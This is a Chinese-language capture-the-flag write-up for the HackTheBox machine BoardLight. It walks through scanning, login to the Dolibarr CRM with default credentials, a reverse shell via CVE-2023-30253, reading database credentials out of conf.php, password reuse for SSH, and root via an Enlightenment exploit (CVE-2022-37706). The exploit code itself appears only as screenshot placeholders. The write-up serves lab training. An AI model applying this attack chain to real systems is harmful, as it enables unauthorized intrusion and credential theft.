HTB BoardLight

BoardLight (Linux · Easy)

CVE-2023-30253 + CVE-2022-37706

枚举

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
nmap -A -Pn -v -T4 10.10.11.11

Nmap scan report for board.htb (10.10.11.11)
Host is up (0.29s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kerne

添加hosts

1
echo "10.10.11.11 board.htb" | sudo tee -a /etc/hosts

gobuster

1
gobuster vhost -u http://board.htb --append-domain -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

image-20240726151133860

添加hosts

1
echo "10.10.11.11 crm.board.htb" | sudo tee -a /etc/hosts

dirsearch

1
2
3
dirsearch -u http://board.htb
Nothing
dirsearch -u http://crm.board.htb

board.htb

image-20240726150114693

crm.board.htb

image-20240726145955767

弱口令

1
admin:admin

google search

image-20240726151435132

利用 CVE-2023-30253 反弹shell

image-20240726152315280

1
cat /var/www/html/crm.board.htb/htdocs/conf/conf.php

image-20240726154346600

1
2
dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';

数据库里基本都是关于网站的信息,猜测密码重用,查下有bash权限的用户,连ssh

image-20240726160304373

image-20240726154219262

权限提升

image-20240726160553270

enlightenment,查看下版本

image-20240726163516682

google search

image-20240726163958750

scp 传过去

1
scp exploit.sh larissa@board.htb:/tmp

赋权执行

image-20240726164219359

⬆︎TOP